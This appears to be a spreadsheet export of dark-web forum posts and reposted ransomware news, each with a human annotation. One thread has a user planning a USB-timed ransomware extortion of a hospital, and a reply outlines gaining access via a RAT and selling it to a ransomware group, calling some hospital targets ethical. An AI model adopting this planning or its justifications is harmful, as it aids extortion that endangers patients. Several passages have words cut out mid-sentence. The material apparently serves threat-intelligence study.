meeting is scheduled for may 18.;;the property tax deadline for 2021 is currently friday, july 2, and like last year, penalties will not be charged on late payments until friday, october 1 due to covid-19. staff are recommending that this year���s deadline be changed to july 31. council will consider the recommendation on may 18.;;individual property tax statements outline all the ways to pay property taxes (in-person, mail-in cheque, onlineand those payment methods will  be available any time after tax notices are mailed (mail-in and online banking are currently available.);;the rmow is also reminding the public that it does not contact individuals by phone or email to request personal information.;;���additionally, the rmow advises community members to continue to exercise a high level of awareness about protecting their sensitive personal information and to practice good password hygiene such as regularly changing passwords to all online accounts and not re-using the same password for multiple accounts,��� the release said.;;;a growing problem;;ransomware attacks have been increasing in frequency as of late, with cyber criminals carrying out operations on higher-profile targets.;;last weekend, a ransomware attack on the colonial pipeline���a critical u.s. pipeline that supplies about 45 per cent of the fuel used along the east coast���prompted president joe biden to issue emergency legislation, while the city of tulsa,ervices after a ransomware attack on may 7.;;���the targeted organizations have gotten bigger and bigger,��� callow said. ���ransomware used to be the bane of mainly small businesses, but that���s no longer the case, and demands have risen considerably as well.���;;the average demand has gone from about $5,000 in 2018 to about $200,000 today, callow said. and while there are no hard stats showing how many companies choose to pay the ransom, ���about 30 per cent would seem to be a reasonable midpoint,��� he added.;;darkside, for instance���the group claiming responsibility for the colonial pipeline hack���has released data stolen from 83 organizations, ���and they have carried out at least 113 attacks that we know about,��� he said. cyber insurance���which the rmow has���could potentially cover everything from the amount of the ransom demand that is paid to the cost of rebuilding the network (minus the deductible).;;but it can also bnizations may be more inclined to pay ransoms, because the money isn���t coming from their own pocket, which of course pushes more money into the whole cyber crime ecosystem, which incentivizes more cyber crime,��� he said.;;���the more profitable it is, the more attacks</t>
  </si>
  <si>
    <t>news article discussing a ransomware attack on whistler and discussing the vulrabillities it exposed</t>
  </si>
  <si>
    <t>19/05/2021 17:42</t>
  </si>
  <si>
    <t>19686c06cfaaeb1ee3cd</t>
  </si>
  <si>
    <t>Hackers Had ���Deep��� Access to Whistler System</t>
  </si>
  <si>
    <t>{'ransomware': 5}</t>
  </si>
  <si>
    <t>[img]http://uoxqi4lrfqztugili7zzgygibs4xstehf5hohtkpyqcoyryweypzkwid.onion/?img=411626268130.webp[/img];;after trying to sell a cache of stolen data, hackers are now dumping some of the information publicly in the hopes of forcing ea to pay a ransom.;;the hackers who previously stole a wealth of data from gaming giant electronic artshave moved from trying to sell that data to now releasing parts of it publicly. in one message on a forum accompanying the data dump, the hackers say explicitly they are trying to extort ea as well;;"few week ago we send email for ransome [sic] to ea but we dont get any response so we will posting the src [source]," one of the posts from the hackers reads. a compressed, 1.3gb cache the hackers released appears to include references to internal ea tools and the company's origin store, according to a copy viewed by motherboard.;;"if they dont contact us or dont pay us we will keep posting it," the hackers threatened. the data they stole totals in at around 780gb, motherboard previously reported. that data includes source code for the frostbite engine, used in games such as battlefield; internal development tools, and software development kits (sdks). the hackers also provided motherboard with screenshots that appear to show data related to the sims.;;in a statement on tuesday, an ea spokesperson told motherboard "we're aware of the recent posts by the alleged hackers and we are analyzing the files released. at this time, we continue to believe that it does not contain data that poses any concern to player privacy, and we have no reason to believe that there is any material risk to our games, our business or our players. we continue to work with federal law enforcement officials as part of this ongoing criminal investigation." ea added it has made security improvements in the wake of the incident.;;in messages over the past few weeks to motherboard, the hackers have repeatedly claimed they have sent ransom demands to ea. at the time, ea told motherboard it had not received such a demand. the company now said it has faced an extortion threat.;;at one point, the hackers asked motherboard to directly deliver an extortion message to ea on their behalf. motherboard declined to do so. now, the hackers have publicly aired their extortion attempt themselves.;;motherboard previously reported that the hackers broke into ea by purchasing a slack login token from an underground market. the hackers then moved through ea's network before finding the source code and other data.</t>
  </si>
  <si>
    <t>post discusing how th ransomwware group that hacked EA Games have begun publishing data in order to threaten the company to pay the ransom</t>
  </si>
  <si>
    <t>20/07/2021 17:24</t>
  </si>
  <si>
    <t>/d/CryptBB</t>
  </si>
  <si>
    <t>4cfea6678ca3273f5016</t>
  </si>
  <si>
    <t>Hackers Move to Extort Gaming Giant EA</t>
  </si>
  <si>
    <t>102 days 01:05:00</t>
  </si>
  <si>
    <t>fuck ea. i hope it all gets dumped on the web.</t>
  </si>
  <si>
    <t>User encouraging this due to a dislike of EA games</t>
  </si>
  <si>
    <t>20/07/2021 17:55</t>
  </si>
  <si>
    <t>0 days 00:31:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;hackers have published extensive patient information from two u.s. hospital chains in an apparent attempt to extort them for money.;;the files, which number in at least the tens of thousands and were posted to a blog on the dark web that the hackers use to name and extort their victims, includes patients��� personal identifying information, like their names, addresses and birthdays, as well as their medical diagnoses. they come from the leon medical centers, which serves eight locations in miami, and nocona general hospital, which has three locations in texas.;;the files also include at least tens of thousands of scanned diagnostic results and letters to insurers. one folder contains background checks on hospital employees. an excel document titled 2018_colonoscopies has 102 full names, dates and details of the procedures, and a field to mark ���yes��� or ���no��� to whether the patient has a ���normal colon.���;;the hacker group thaecurity researchers. they typically first encrypt their victims��� files and demand payment, and it���s rare for them to publicly release such files first. but at least with nocona, that appears to be what happened. the motive for the release of the files is unclear.;;the leak highlights how hackers have in recent years steadily targeted american hospitals, small businesses, schools and government computers, often infecting them with ransomware,which is malicious software that locks up computers, rendering them inoperable. hackers then demand payment, usually in bitcoin, to unlock the files.;;at least 560 health care providers were hit with ransomware in 2020, according to a survey by the cybersecurity firm emsisoft. in october, several federal agencies issued war"an increased and cybercrime imminent threat" directed at hospitals.;;some ransomware gangs have declared hospitals off limits, but others have found them particularly ripe targets. the fallout when doctors and nurses suddenly can't access their computers can be severe. and since many hospital chains share the same computer networks across dozens or hundreds of physical locations, a single ransomware infection can delay medical procedures across the country.;;some ransomware gangs have increasingly turned to leaking their victims��� personal files online if they refuse to pay, but dumping such vast troves of personal medical information is a line that not many have crossed, brett callow, a ransomware analyst at emsisoft, said.;;���when financial stuff leaks, people can at least fix their credit,��� callow said in a text message. ���not so with health stuff. once it's out there, it's out there.��� in january, leon medical centers announced that it had been hacked in november, and that it had soon determined that ���cerl���s environment that contain personal information had been accessed by the cybercriminals.���;;that includes ���name, contact information, social security number, financial information, date of birth, family information, medical record number, medicaid number, prescription information, medical and/or clinical information including diagnosis and treatment history, and health insurance information,��� the announcement said.;;as first reported by databreaches.net, a website that tracks exposures of medical data, leon has notified the u.s. department of health and human services of a data breach, but only estimated 500 patients were affected.;;in an emailed statement, yolanda foster, a spokesperson for leon, wrote: ���we are working diligently with third-party forensic experts to complete an investigation into the matter. as soon as possible, we will provide direct notifications to any affected individuals.���;;one lingering question is why the hackers, who did not respond toil address or through their website, leaked the information. many hacker groups, including the one that posted the two hospitals' patient information, only leak sensitive files as retribution when their victims don't pay for ransomware.;;foster declined to address specifics about whether leon had been hit with ransomware. nocona didn't appear to have been a victim of ransomware, and no systems there appear to have been encrypted, brian jackson, an attorney representing the firm, said.;;"i can't tell you with absolute certainty that they did not send a ransom demand," he said in a phone call. "i can tell you we did not open one."</t>
  </si>
  <si>
    <t xml:space="preserve">news article discussing the release of confidential hospital/customer details from two hospitals and how hackers have targeted hospitals </t>
  </si>
  <si>
    <t>23/02/2021 16:24</t>
  </si>
  <si>
    <t>633acb05b56c3a453cc6</t>
  </si>
  <si>
    <t>Hackers Post Detailed Patient Medical Records from Two Hospitals to The Dark Web</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;an analysis of the cyberattack on colonial pipeline found that the hackers were able to access the company���s network using a compromised vpn password, bloomberg reported. the hack led to a ransomware payout of $4.4 million, and resulted in gas prices around $3 per gallon for the first time in several years at us gas stations.;;;source:;the verge / msn;;according to cybersecurity firm mandiant, the vpn account didn���t use multi-factor authentication, which allowed the hackers to access colonial���s network with a compromised username and password. it���s not clear whether the hackers discovered the username or were able to figure it out independently. the password was discovered among a batch of passwords leaked on the dark web, bloomberg reported.;;the breach occurred april 29th, according to mandiant, and was discovered on may 7th by a control room employee who saw the ransomware note. that prompted the company to take the pipeline offline to cont. close to half of the fuel in the eastern us travels through the affected pipeline.;;in response to the hack, the transportation security administration put a new policy into place requiring pipeline operators to report cyberattacks to the government within 12 hours. colonial pipeline ceo joseph blount is scheduled to appear before the house committee on homeland security on june 9th.</t>
  </si>
  <si>
    <t xml:space="preserve">news article describing how darkside got access to colonal pipeline systems (a compromised password) </t>
  </si>
  <si>
    <t>532171089de3d11c9e36</t>
  </si>
  <si>
    <t>Hackers Reportedly Used a Compromised Password in Colonial Pipeline Cyberattack</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;prominent apple supplier quanta on wednesday said it suffered a ransomware attack from the revil ransomware group, which is now demanding the iphone maker pay a ransom of $50 million to prevent leaking sensitive files on the dark web.;;in a post shared on its deep web "happy blog" portal, the threat actor said it came into possession of schematics of the u.s. company's products such as macbooks and apple watch by infiltrating the network of the taiwanese manufacturer, claiming it's making a ransom demand to apple after quanta expressed no interest in paying to recover the stolen blueprints.;;"our team is negotiating the sale of large quantities of confidential drawings and gigabytes of personal data with several major brands," the revil operators said. "we recommend that apple buy back the available data by may 1.";;since first detected in june 2019, revil (aka sodinokibi or sodin) has emerged as one of the most prolific ransomware-as-a-service (raas) groups, with the gang being the first to adopt the so-called technique of "double extortion" that has since been emulated by other groups to maximize their chances of making a profit.;;the strategy seeks to pressure victim companies into paying up mainly by publishing a handful of files stolen from their extortion targets prior to encrypting them and threatening to release more data unless and until the ransom demand is met.;;the main actor associated with advertising and promoting revil on russian-language cybercrime forums is called unknown, aka unkn. the ransomware is also operated as an affiliate service, wherein threat actors are recruited to spread the malware by breaching corporate network victims, while the core developers take charge of maintaining the malware and payment infrastructure. affiliates typically receive 60% to 70% of the ransom payment.;;all these aggressive shifts in tactics have paid off, as ransomware operators netted more than $350 million in 2020, a 311% jump from the previous year, according to blockchain analysis company chainalysis. the latest development also marks a new twist in the double extortion game, in which a ransomware cartel has gone after a victim's customer following an unsuccessful attempt to negotiate ransom with the primary victim.;;however, in a statement shared with bloomberg, the company said it worked with external it experts in response to "cyber attacks on a small number of quanta servers," adding "there's no material impact on the company's business operation."</t>
  </si>
  <si>
    <t>news article discussing the ransomware attack on Quanta (Apple supplier) and stols scematics</t>
  </si>
  <si>
    <t>28/04/2021 15:38</t>
  </si>
  <si>
    <t>a5ee2b9d1b199f3b1544</t>
  </si>
  <si>
    <t>Hackers Threaten to Leak Stolen Apple Blueprints if $50 Million Ransom Isn't Paid</t>
  </si>
  <si>
    <t>{'extortion': 2, 'sodinokibi': 1, 'revil': 4, 'ransomware': 5}</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;a ransomware attack on the transform hospital group has led to fears embarrassing photographs could be published online. hackers are threatening to publish ���before and after��� pictures of patients who have had surgery after vast amounts of data were stolen from a major cosmetic surgery chain, it has emerged.;;the transform hospital group suffered a ransomware attack and has reported the incident to the information commission. the company, which has had numerous celebrity endorsements, has also written emails to its customers warning of the ���data security incident���.;;a hacker group known as revil boasted on the darknet webpage of how it had obtained more than 900 gigabytes of patient photographs. the group said the ���intimate photos of customers��� were ���not a completely pleasant sight���. the transform hospital group, also known as the hospital group, claims to be britain���s leading weight loss and cosmetic surenlargements, nipple corrections, nose adjustments and weight loss. a spokesperson for transform hospital group said: ���we can confirm that our it systems have been subject to a���data security breach.;;���none of our patients��� payment card details have been compromised but at this stage, we understand that some of our patients��� personal data may have been accessed. ���we have alerted all of our patients to the incident and will be providing them with regular updates as the picture becomes clearer.;;���we have secured our systems and a full investigation is underway to���understand���the extent of the incident. we are working with the national cyber security centre, information commissioner���s office, cyber security experts and the police to resolve the situation as quickly as possible.���;;it is understood that any images the hackers may have obtained would not include patients' faces as images are stored anonymously and show the body pa. the company has previously promoted itself via celebrity endorsements, although in recent years it has not done so.;;atomic kitten singer kerry katona, shameless actress tina malone and reality tv star joey essex from the only way is essex are previous patients who have endorsed the clinic.;;in an interview with the bbc, simon hails who had chest reduction surgery with the company, said: i have had an email from the hospital group informing me of a 'data security incident' but no detail as to what has been hacked, he told the bbc.;;i'm obviously concerned as the last thing i want is 'before photos' being splattered around in the public domain. i've tried to keep my surgery private and not even some of my friends and colleagues know about it, so the data breach is concerning for me.;;ransomware is one of the more prolific forms of cyber attacks. it usually involves hackers gaining access to a computer network to obtain files. many victims of such attacks are encouraged not to pay ransoms to avoid fuelling the crime.;;revil, which is also known as sodinokibi, has target numerous other companies.</t>
  </si>
  <si>
    <t>news article discussing the ransomware attack on the transform hospital group leading to possible exposure of indelicate cosmetic surgery photos</t>
  </si>
  <si>
    <t>f592145eb79c1cfbdd32</t>
  </si>
  <si>
    <t>Hackers Threaten to Post 'Before and After' Pictures of Cosmetic Surgery Patients</t>
  </si>
  <si>
    <t>{'revil': 1, 'ransomware': 2}</t>
  </si>
  <si>
    <t>the hackers behind a huge ransomware attack said late sunday on their blog that they want $70 million (���59 million) in bitcoin to publicly release what they are call"universal decryptor.";;the firm kaseya which helps firms remotely manage their it infrastructure was hit friday in an attack believed to have been carried out by russian-linked cybercrime gang revil. the attack infected hundreds of companies in at least 17 countries.;;the group is best known for the recent attack on jbs meat processing. in that instance, revil was able to extort $11 million from the firm in a ransomware payment.;;on saturday, us president joe biden said there would be a response if investigations determined the kremlin was linked in any way.;;the largest ransomware attack on record has hit the it systems of up to 1million companies on virtually every continent as russian-linked hackers demand $70million in cryptocurrency to fix it.;;swedish grocery stores, schools in new zealand, and two major dutch it firms were among the victims of hacking group revil which launched its attack on friday after breaching the systems of us-based software firm kaseya.;;kaseya says just a few dozen of its customers were directly affected by the attack, but knock-on effects have brought down firms in 17 countries - with one expert saying the attack is 'unprecedented' in its scale and sophistication.;;revil, which was behind the recent hack of meat processor jbs which saw an $11million ransom paid, has been negotiating ransoms of up to $5million with individual firms - but now says for $70million it will unlock all affected networks.</t>
  </si>
  <si>
    <t>news article related to the kaseya ransomware attack, attacker asking for ransom for decryptor</t>
  </si>
  <si>
    <t>/u/Snipes</t>
  </si>
  <si>
    <t>/d/MGMGrand</t>
  </si>
  <si>
    <t>50a5a786194d9a9a3173</t>
  </si>
  <si>
    <t>Hackers want $70 million for decryption</t>
  </si>
  <si>
    <t>0 days 08:00:00</t>
  </si>
  <si>
    <t>{'revil': 2, 'ransomware': 3}</t>
  </si>
  <si>
    <t>ransomware easy to do ? xdddddddddd</t>
  </si>
  <si>
    <t>User exclaiming disbelief that ransomware is easy to do</t>
  </si>
  <si>
    <t>26/04/2022 22:19</t>
  </si>
  <si>
    <t>b0ead68bf4acd0c908e8</t>
  </si>
  <si>
    <t>Hacking-Money scale?</t>
  </si>
  <si>
    <t>0 days 18:51:00</t>
  </si>
  <si>
    <t>hi, first off i have absolutely zero experience with malware/ransomware and wanted to experiment around with rats, but didnt want to pay hundreds of dollars for something like warzone.;so i saw a listing on alphabay by rvaska for a "hack mega pack" that contains a rat and some other useful stuff (i guess) for about 3 dollars, which i think looks pretty sketchy.;their ratings on recon are overall very good tho and they seem to have a history on whm, versus, torrez and bohemia, so i bought the pack anyway. its only 3 dollars..;they provided me with a mega dot nz link with a rar archive named "2021 hack and crack pack".;;i was wondering if i/my pc would be save if i use that stuff in a vm with kali linux and if some of you maybe even know rvaska or have experience with their products?;should i turn off the network adapter in virtualbox?</t>
  </si>
  <si>
    <t>User for more information on ransomware and rats (how to run one safely)</t>
  </si>
  <si>
    <t>/u/coati808</t>
  </si>
  <si>
    <t>d706fdf99453fd1785be</t>
  </si>
  <si>
    <t>Hackpack by rvaska on AlphaBay</t>
  </si>
  <si>
    <t>31 days 04:31:00</t>
  </si>
  <si>
    <t>isolate the wm when you run tests / cut off the internet connection ...and run it only in safe environment vm...not in your main os</t>
  </si>
  <si>
    <t>User responding saying only to run it in safe enviroments such as virtual machienes</t>
  </si>
  <si>
    <t>/u/MrLivian</t>
  </si>
  <si>
    <t>posted by: sam jona;;;;a report released by cryptonite, a cyber-security firm shows that ransomware attacks on healthcare organizations are on a decline despite flashy attacks recently. according to the report, the number of ransomware attacks decreased from 19 in the first quarter of 2017 to eight in the same quarter of 2018. despite the allscripts and labcorp attack in the healthcare industry, there has been a 57 percent decrease in ransomware attacks in 2018 as compared to 2017. this in a way shows that the health institutions have prioritized cyber security. compared to the 140 it/hacking incidents recorded in the first half of 2017, 59 it/hacking cases have been recorded so far in 2018 according to the report. researches by other firms also establish a similar trend.;;michael simon, the ceo and president of the cybersecurity firm said that he expects cybercriminals to adjust their techniques to regain control over medical and mobile devices in response to the downtrend in the use of ransomware in the first half of 2018.;;there has been a nine percent increase in compromised records compared to last year, with 1,928,432 comprised record cases recorded so far.;;simon added that healthcare will continue to be a target for cybercriminals as they seek to offer obtained records for sale on the dark web. last year, it was reported that 76 percent of hacked health organization data was sold on the darknet. medical records have been said to contain a complete data plan for identity theft and financial fraud.;;another firm, skybox security released a similar report. according to them, the second half of 2017 recorded 32 percent of ransomware related cases and seven percent of cryptocurrency miners while the first half of 2018 recorded 32 percent of cryptocurrency miners and eight percent of ransomware attacks. this report confirms a decline in ransomware attack in 2018 just as cryptonite reported.;;according to the report, browser based malware is still on the rise and organizations are prone to malware attacks. this has been attributed to the fact that it always has to interact with websites. and mostly, cybercriminals infect applications with malwares difficult to detect. this constant interaction explains why browser based malware is still on the rise. individuals and institutions are still advised to take cyber-security serious. institutions have been advised to invest in cyber-security to avoid falling into the hands of cybercriminals.;;kaspersky lab, another cyber-security firm experienced a decline in ransomware attacks on the users of its products. to demonstrate, 2,581,026 ransomware attacks recorded in 2016-2017 declined to 1,811,937 in 2017-2018. in total, there has been a 30 percent decrease. unlike the middle of 2017 which experienced a number of ransomware attacks sending the recorded number of cases very high, this year has been quite different. its users who encountered cryptocurrency miners have however risen by 44.5 percent. they recorded 1,899,236 attacks in 2016-2017. this increased to 2,735,611 in 2017-2018.;;the kaspersky report explained that ransomware attackers usually gain huge profits for each successful operation. however, cryptocurrency miners make less as compared to them, but they are able to mine continuously for a long term.;;ransomware has been quite popular over the years, more so than the cryptocurrency miners because they require encryption to hold data hostage, and take note of how victims go about the ransom payment. criminals who use the cryptocurrency miners, can mine cryptocurrencies from the source. cryptocurrency miners affect healthcare by degrading their it organization structure due to the computational power involved in mining. with the increasing awareness programs, it is expected that organizations will employ measures to deal with this side of the attacks.;;skybox director of threat intelligence marina kidron believes that the commotion caused by the wannacry attack last year forced institutions to take proactive measures against cyber-attacks. most healthcare institutions have backup plans and thwarted attacks with decryption programs. it has been reported also, that the rise in bitcoin���s value has been one of the reasons for the high record of ransomware cases. with respect to this, it can be concluded that the poor performance and the constant fall in cryptocurrency value has led to the less ransomware attacks in 2018.;;link: http://deepdot35wvmeyd5.onion/2018/08/08/healthcare-ransomware-attack-declines-despite-flashy-a</t>
  </si>
  <si>
    <t>Post discucssing a report that ransomware attacks on healthare are on the decline despite some notable attacks at the time</t>
  </si>
  <si>
    <t>/u/Witchman05</t>
  </si>
  <si>
    <t>0378f8ce507e3a8462f0</t>
  </si>
  <si>
    <t>Healthcare Ransomware Attacks Declines Despite Flashy Attacks</t>
  </si>
  <si>
    <t>{'ransomware': 13}</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;over the last year, the education delivery model has changed rapidly. universities have learnt to operate entirely remotely and now that learning may resume in person, a hybrid education model will likely continue. the transition from physical to online models happened so quickly that it left many it networks exposed to serious harm from outside forces. with a hybrid model, there is likely a widening attack surface area.;;;source:;infosecurity magazine;;a recent spate of attacks suggests that cyber-criminals are taking notice of the seemingly infinite weaknesses in learning centers defenses. but why? one of the primary reasons is that universities operate large corporate-sized networks, but without the budgets to match. add to that, teachers and students aren���t given training to use and connect their technology in a safe way.;;to avoid falling victim to devastating cyber-attacks which often have dire consequences, we share three lessons universities need to quickly t board.;;;your research is valuable to cyber-criminals;;there is a hefty price tag on some of the research conducted by universities, which makes it particularly attractive to cyber-criminals. the university of oxford���s division of structural biology was targeted in february by hackers snooping around, potentially in search of information about the vaccine the university has worked on with astrazeneca. it���s not just gangs of cyber-criminals targeting research facilities, last year russian state backed hackers were accused by official sources in the us, uk and canada of trying to steal covid-19 vaccine and treatment research.;;with world-leading research hidden in the networks of universities, its unsurprising that last year over half (54%) of universities surveyed said that they had reported a breach to the ico (information commissioner���s office). the research conducted by many uk universities makes them an attractive target for financially motivated cyber-criminals and state-sponsored of valuable intellectual property.;;to add insult to injury, ransomware attackers are doubling their opportunity for pay off by selling off the stolen information to the highest bidder, causing a serious headache for the victims while potentially increasing the value of their pay-out.;;;personal information of students and staff can easily fall into the wrong hands;;based on tests of uk university defenses, hackers were able to obtain ���high-value��� data within two hours in every case. in many cases, successful cyber-attacks are followed by not only a ransom note demanding payment for the recovery of frozen or stolen data, but also the added threat of sharing any sensitive stolen information with the public.;;with a combination of students, educators and other staff within universities ��� many of which haven���t been trained to recognize phishing emails ��� universities are subjected to millions of phishing emails a year. attackers use phishing to break into university netword, in search of data they believe has the highest value ��� both to the victim and to other cyber-criminals who might pay good money for it. quite often, this information is sold or published on the dark web, which can lead to staff and students becoming victims of further crimes, such as identity theft.;;universities can combat this with regular penetration testing ��� a process whereby security professionals act on your behalf to find and test weaknesses that criminals could manipulate. there are also a number of training tools such as sophos phish threat which simulates an attack to test and educate end users.;;;a cyber-attack can knock everything offline;;higher education facilities continue to be a concern for the uk's cybersecurity agency, as cyber-attacks have been steadily on the rise in this sector. in march of this year, the ncsc shared a renewed warning to education facilities following a spate of ransomware attacks against academic institutions in february ��� a trend that seems  at least one university being hit each month in 2021.;;with some students still studying remotely, an attack could see students left sitting at home, unable to access course materials, online tools and any of the other resources they need to get on with their work. for university students paying ��9,000 a year and facing some of the most important exams of their lives, the implications of a cyber-attack are enormous on both a financial and personal level. along with the crippling costs of getting online services back up and running, the reputational damage can have dire financial consequences for universities which rely on students for income.;;one of the most effective ways to protect staff and students is with preventative action, such as sophos managed threat response which hunts down cyber-criminals on the network and takes targeted action before they have the chance to cause harm. better still, with greater cyber awareness and security training, universities can reduce the chance of attackers breakinto their system in the first place.;;with their budgets stretched in every direction, cash-strapped universities will be asking themselves if they can afford to invest in top of the range cybersecurity defences. unfortunately, with the threat only growing, they really need to be asking themselves if they can afford not to.</t>
  </si>
  <si>
    <t>news article discussing what education departments such as universities need to be aware of now they are going remote in orde to avoid cyber attacks</t>
  </si>
  <si>
    <t>5f67360f90ed8a11d578</t>
  </si>
  <si>
    <t>Here���s What Universities Need to Know About Cyber-A</t>
  </si>
  <si>
    <t>is it ethical to go into a hospital room, set a timed execution on your usb with the ransomware that will automatically execute after the specified amount of time, encrypt their network (or atleast say you did and just make it look like you did) have text show on the doctors screen "we have encrypted your hospitals network,data, and other information, we are demanding so and so amount of money *large amount because they are a "rich greedy hospital" if we dont recieve this amount of money in bitcoin within (however long you want) we will download your data onto our servers, and sell it to cybercriminals who will do worse things than what we are doing. email us at 'what @ ever. com' we are waiting for your response";;i am trying to learn how to build ransomware (or just scare tactics) to complete this plan.;;i am trying to earn a fat amount from this.;;i'm going to be closing tor and going to sleep, i will respond to messages later or tomorrow</t>
  </si>
  <si>
    <t>post asking is it ethical to perform a timed ransomware attack on a hospital</t>
  </si>
  <si>
    <t>28/04/2022 23:32</t>
  </si>
  <si>
    <t>bab214eda0ac64d4332b</t>
  </si>
  <si>
    <t>Hospital ransoming?</t>
  </si>
  <si>
    <t>3 days 11:13:00</t>
  </si>
  <si>
    <t>there are plenty of greedy businesses everywhere, don't target the medical field if you don't want to be treated as a cunt.</t>
  </si>
  <si>
    <t>user telling the original poster not to attack the medical field. Stating there are better targets</t>
  </si>
  <si>
    <t>/u/crunchserg</t>
  </si>
  <si>
    <t>28/04/2022 23:53</t>
  </si>
  <si>
    <t>0 days 00:21:00</t>
  </si>
  <si>
    <t>if it is rich people's hospital, or if is just aesthetical surgery hospital, or special dedicated police hospital... yes, then is very ethical, robin hood act in my opinion.;;altough i personally never attacked haspitals, even before revil did introduced policy which is not allowin attacks on hospitals. because it can cause an accidental death, even if is a death of someone rich or a cop ( or better to say, because it is death of someone rich ) too much dust will be up in the air, and investigation, and foreign services will deffinitelly increase preassure on entire ransomware group.;;specially targeting random hospitals ( cause of high possibility of paying ) like conti/ryuk or 1 specific person from maze is pure evil.;;'trying to learn to build ransomware ?';you are joking, right  ?;;if you already have high value target for ransomware attack, and you have balls to do a hotplug attack there ( i suppose you can't just hotplug the admin device ), so it would need first to be some rat, to gain initial access, gain the admin access, before executing ransomware.;i have contacts with literally anyone of any significance in world of ransomware, the best thing you can is just find raas group which would give you agreed for % for you giving them initial access ( which yo gain through hot plug or whatever )</t>
  </si>
  <si>
    <t>user debating it is ethical if the hospital only caters to rich clientel (robin hood act) but otherwise to avoid in order to avoid causing death</t>
  </si>
  <si>
    <t>/u/basterlord</t>
  </si>
  <si>
    <t>29/04/2022 09:48</t>
  </si>
  <si>
    <t>0 days 01:58:00</t>
  </si>
  <si>
    <t>{'revil': 1, 'ransomware': 3, 'raas': 1}</t>
  </si>
  <si>
    <t>dude, you know what i meant when i said building ransomware</t>
  </si>
  <si>
    <t>Original poster asking for minimal ransomware guides</t>
  </si>
  <si>
    <t>29/04/2022 16:35</t>
  </si>
  <si>
    <t>0 days 06:47:00</t>
  </si>
  <si>
    <t>you wanna send me some guides on minimal work ransomware?</t>
  </si>
  <si>
    <t>29/04/2022 16:43</t>
  </si>
  <si>
    <t>would it just be a case of plugging in a usb into a pc on a network ?</t>
  </si>
  <si>
    <t>/u/PineappleJuice</t>
  </si>
  <si>
    <t>2 days 07:26:00</t>
  </si>
  <si>
    <t>the ransomware criminal business is thriving whether it���s bad rabbit, ryuk, locky or any other of the various data-encrypting malware. cybercriminals have been smiling all the way to the bank in the past few months, recording thousands of dollars gained from infected victims who obliviously feel into the criminals��� traps.;;currently, cyber experts have sent a warning regarding the state of ransomware economy. the industry will continue to grow as hackers become more sophisticated in their operations and range.;;even as 2020 begins to take shape, players in government and healthcare industry had seen a 20% increase in ransomware attacks in the second month of 2019. the reality that the attacks will keep coming is here to stay.;;at this point, you are probably wondering what is the place of cryptocurrencies in all these cases?;;before we dive right into the subject, let���s touch on a little history to understand where bitcoin and other cryptocurrencies became integrated into the ransomwary.;;a history of extortion;;as far as we can all remember, online extortion was already a thing even before the creation of bitcoin. we can recall how cybercriminals even went further to employ postal services in receiving payments for scams schemed around viruses.;;back then, a significant number of such viruses operated in a similar fashion to the ransomware tools of today. while many hackers made a killing at the time, today���s ransomware attacks have turned out to be more lucrative than the historical forms of extortion.;;this aspect stems from the fact that law enforcement agencies would have a field day in nabbing the cybercriminals as soon as they showed up to pick payments. further, the local authorities had a firm grip on postal routes monitoring mailboxes and arresting criminals whenever they picked goods.;;this failure led cybercriminals to turn to online payment systems, including money transfer services like paypal and western union, to get paid by victims of malicious software. it would lurn out that this alternative was still a bad idea since payment platforms were still linked to bank accounts that would be traced to actual people.;;it is at this point that bitcoin became adopted as the preferred mode of payment as cryptocurrency appealed to cybercriminals for its promise of anonymity.;;the role of crypto in ransomware attacks;;today, cybercriminals demand ransom in form of bitcoin ��� an option that offers a secure system of exchange that can move past the watchful eye of law enforcement agencies.;;it can be inferred that as bitcoin���s popularity rose in the recent years, a significant surge in ransomware attacks has been witnessed along its side. this observation leads us to wonder whether the growth of crypto and ransomware demonstrate a symbiotic relationship.;;otherwise, before we find out why bitcoin became popular among ransomware criminals, let���s understand how a crypto-enabled ransomware attack looks like.;;any ransomware attack constitutes three components, anemain true regardless of the nature of a target ��� whether it���s young john doe down the street, your loved one or a blue chip organization:;hackers gain unauthorized access to your device with express permission to alter the sensitive data your computer holds.;hackers install malware on the device with the intention of encrypting the files therein ��� they employ sophisticated cryptographic techniques and hold a key that gives them full control over your data.;hackers demand to be paid in bitcoin, in exchange for the key.;;looking at the above scenario which as mentioned already has become a classic case in any ransomware attack, we realize that unauthorized computer access is the root problem. cryptography and crypto become its enabler.;;why bitcoin is a darling to ransomware criminals;;apart from the transactional anonymity that bitcoin promises, criminals love crypto for the fact that it enables the immediate transfer of extorted monies to their possession.;;in fact, looking at other ol cybercrime, including some of the most dangerous data-stealing banking trojans, it is only bitcoin (and other cryptocurrencies) that can offer this kind of advantage.;;this aspect presents itself in the sense that trojan cases are traceable since law enforcement agents can establish a trail on the involved stolen identities and actual perpetrators that constitute such attacks.;;importantly, ransomware criminals benefit from the flexibility that characterizes crypto payment transactions. this attribute is more preferred to traditional payment systems where individual login and financial credentials are required.;;in this sense, if a hacker harvests enough funds from a specific campaign or catch wind that the cops are on their trail  they can simply move with their business to a different location.;</t>
  </si>
  <si>
    <t>article discussing how cryptocurriencies have helped influence and grow ransomware groups</t>
  </si>
  <si>
    <t>27/03/2020 20:44</t>
  </si>
  <si>
    <t>4cedd3b5958eadad15a0</t>
  </si>
  <si>
    <t>How Cryptocurrencies are Contribting to the Growth of  Ransomwares</t>
  </si>
  <si>
    <t>{'extortion': 1, 'ransomware': 15}</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;cyberattacks using ransomware are increasing in frequency, and ransom payments made to the hackers are swelling as well. cryptocurrency and the exchanges where digital currency can be traded anonymously have emerged as key tools for the cyber extortionists. the vast sums being paid by corporations to regain control of their computers would have been near-impossible to move in any other legitimate currency market, experts say.;;source: washington post;;1. how is crypto used in cybercrime?;;a typical ransomware attack on a company or organization might proceed like this: executives realize their business website is down or systems inaccessible, and administrator overrides don���t work. a ransom demand arrives via email, providing a bitcoin address where the payment must go if the company wants its systems operational again, along with a deadline. the victim calls up the bitcoin address, which is 26 to 34 characters in length, when signing onto a cryptocurrency exchange t the deposit.;;2. what makes crypto attractive to criminals?;;the anonymity built into the digital ledger system known as blockchain, which forms the foundation of cybercurrencies, can be leveraged through a variety of maneuvers. a ransom paid in bitcoin can be swiftly run through a so-called cryptocurrency mixer, which obscures the trail of ownership by pooling it with other people���s holdings. (while the practice itself is not considered illegal, mixer operators can get into trouble if found to have 